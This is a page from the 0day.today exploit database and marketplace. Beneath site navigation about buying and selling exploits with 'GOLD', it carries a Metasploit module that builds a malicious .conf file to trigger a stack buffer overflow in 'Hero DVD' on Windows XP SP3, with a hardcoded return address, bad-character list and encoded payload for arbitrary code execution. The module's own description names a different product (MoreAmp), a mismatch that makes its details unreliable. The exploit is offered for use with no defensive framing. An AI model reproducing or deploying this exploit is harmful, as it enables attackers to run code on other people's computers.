0day.today - Biggest Exploit Database in the World.
Things you should know about 0day.today:
Administration of this site uses the official contacts. Beware of impostors!
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!
Please, beware of scammers!
Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Hero DVD Buffer Overflow Exploit (meta)
======================================= Hero DVD Buffer Overflow Exploit (meta) ======================================= ################################################################## # _ # # .-----.--.--.--.----.----.-| |___ # # | _ | | | | | -__| _ | # # | __|________|__|__|_____|_____| # # |__| By MadjiX # # Sec4ever.com # ################################################################## # Note: Use Backtrack! place httpd.conf in /etc/apache2/ and start apache # Have Someone Connect to your Server /sploit require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = NormalRanking include Msf::Exploit::FILEFORMAT include Msf::Exploit::Remote::Seh def initialize(info = {}) super(update_info(info, 'Name' => 'Hero DVD Remote Buffer Overflow Exploit', 'Description' => %q{ This module exploits a stack overflow in 3.0.8 MoreAmp Beta By creating a specially crafted .conf file, an an attacker may be able to execute arbitrary code. }, 'License' => MSF_LICENSE, 'Author' => 'MadjiX <Dz8@HotmaiL[DoT]CoM>', 'Version' => 'Version 1', 'References' => [ [ 'OSVDB', 'N/A' ], [ 'URL', 'http://www.exploit-db.com/exploits/14257/' ], ], 'DefaultOptions' => { 'EXITFUNC' => 'process', }, 'Payload' => { 'Space' => 750, 'BadChars' => "\x00\x20\x0a\x0d", 'StackAdjustment' => -3500, }, 'Platform' => 'win', 'Targets' => [ [ 'Windows XP SP3', { 'Ret' => 0x58324879} ], # 0x58324879 from msg723.acm ], 'Privileged' => false, 'DisclosureDate' => '19-07-2010', 'DefaultTarget' => 0)) register_options( [ OptString.new('FILENAME', [ false, 'The file name.', 'MadjiX.conf']), ], self.class) end def exploit sploit = "Redirect permanent /sploit http://" sploit << rand_text_alphanumeric(128) sploit << [target.ret].pack('V') sploit << "B" * 24 sploit << payload.encoded maffile = sploit print_status("Creating '#{datastore['FILENAME']}' file ...") file_create(maffile) end end # 0day.today [2024-11-15] #